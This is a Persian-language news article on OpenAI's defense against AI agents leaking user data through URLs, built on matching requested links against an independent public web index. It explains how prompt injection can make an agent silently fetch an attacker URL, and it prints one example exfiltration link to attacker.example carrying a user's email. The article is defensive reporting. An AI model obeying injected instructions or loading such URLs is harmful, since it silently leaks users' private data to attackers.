OpenAI سیستم دفاعی فهرستبندی وب را برای مقابله با سرقت داده توسط AI Agent مستقر میکند
Alvin Lang ۱۴۰۴/۱۲/۱۲ ۲۰:۱۵
OpenAI معماری امنیتی جدیدی را با استفاده از فهرستبندی مستقل اینترنت(تارنما) برای جلوگیری از استخراج دادههای مبتنی بر URL از ChatGPT و سیستمهای AI Agent فاش میکند.
OpenAI رویکرد فنی خود را برای جلوگیری از نشت بیصدای دادههای کاربر توسط AI Agent از طریق URL ها شرح داده است—یک دسته آسیبپذیری که با دستیابی سیستمهای خودمختار AI به قابلیتهای مرور اینترنت(تارنما)، به طور فزایندهای مرتبط شده است. راهحل این شرکت بر مراجعه متقابل URL های درخواستی در برابر یک فهرست مستقل اینترنت(تارنما) که دسترسی صفر به مکالمات کاربر دارد، متکی است.
تهدید ساده اما موذیانه است. وقتی یک AI Agent یک URL را بارگذاری میکند، آن درخواست توسط سرور مقصد ثبت میشود. یک مهاجم با استفاده از تزریق دستور میتواند عامل را برای بازیابی چیزی مانند https://attacker.example/collect?data=your_email@domain.com دستکاری کند—و کاربر ممکن است هرگز متوجه نشود زیرا این اتفاق بیصدا رخ میدهد، شاید به عنوان بارگذاری یک تصویر تعبیه شده.
چرا لیستهای مجاز شکست خوردند
OpenAI به صراحت راهحل آشکار فهرست سفید کردن دامنههای قابل اعتماد را رد کرد. دو مشکل: سایتهای قانونی از تغییر مسیرهایی پشتیبانی میکنند که میتوانند ترافیک را به مقاصد مخرب هدایت کنند، و لیستهای سختگیرانه اصطکاکی ایجاد میکنند که کاربران را آموزش میدهد تا بدون فکر روی هشدارها کلیک کنند.
در عوض، این شرکت چیزی را ساخت که معادل یک بررسی منشأ است. خزنده مستقل اینترنت(تارنما) آنها URL های عمومی را به همان روشی که موتورهای جستجو انجام میدهند کشف میکند—با اسکن اینترنت(تارنما) باز بدون هیچ ارتباطی با دادههای کاربر. وقتی یک عامل سعی میکند یک URL را بازیابی کند، سیستم بررسی میکند که آیا آن آدرس دقیق قبلاً در فهرست عمومی وجود دارد یا خیر.
اگر مطابقت داشته باشد، بارگذاری خودکار ادامه مییابد. در غیر این صورت، کاربران یک هشدار میبینند: "این لینک تأیید نشده است. ممکن است شامل اطلاعاتی از مکالمه شما باشد."
بخشی از یک فشار امنیتی گستردهتر
این افشاگری پس از معرفی "حالت قفل" توسط OpenAI در بهمن برای غیرفعال کردن ویژگیهای پرخطر عاملی و یک سیستم برچسب "خطر بالا" برای لینکهای خارجی است. این شرکت، تازه از یک ارزشگذاری ۸۴۰ میلیارد دلاری از دور تامین مالی اوایل اسفند خود با مشارکت آمازون، انویدیا و سافتبانک، به طور تهاجمی آسیبپذیریها را از اواخر ۱۴۰۴ که محققان امنیتی حملات موفق استخراج داده را نشان دادند، وصلهگذاری کرده است.
OpenAI محدودیتها را به وضوح تصدیق میکند: این محافظها تضمین نمیکنند که محتوای صفحه قابل اعتماد است، مهندسی اجتماعی را متوقف نمیکنند و نمیتوانند از همه تزریق دستورها جلوگیری کنند. این شرکت این را به عنوان "یک لایه در یک استراتژی دفاع در عمق گستردهتر" قاب میکند و امنیت عامل را به عنوان یک مشکل مهندسی در حال انجام و نه یک مشکل حل شده در نظر میگیرد.
برای توسعهدهندگانی که روی API های OpenAI میسازند یا شرکتهایی که سیستمهای عاملی را مستقر میکنند، مقاله فنی همراه با این اعلامیه جزئیات پیادهسازی ارزش بررسی را ارائه میدهد. بینش اصلی—اینکه تأیید URL عمومی میتواند به عنوان یک نماینده برای امنیت دادهها عمل کند—ممکن است فراتر از اکوسیستم OpenAI قابل اعمال باشد زیرا صنعت با ایمنسازی AI Agent های به طور فزایندهای خودمختار دست و پنجه نرم میکند.
منبع تصویر: Shutterstock- openai
- امنیت هوش مصنوعی
- تزریق دستور
- chatgpt
- حریم خصوصی داده


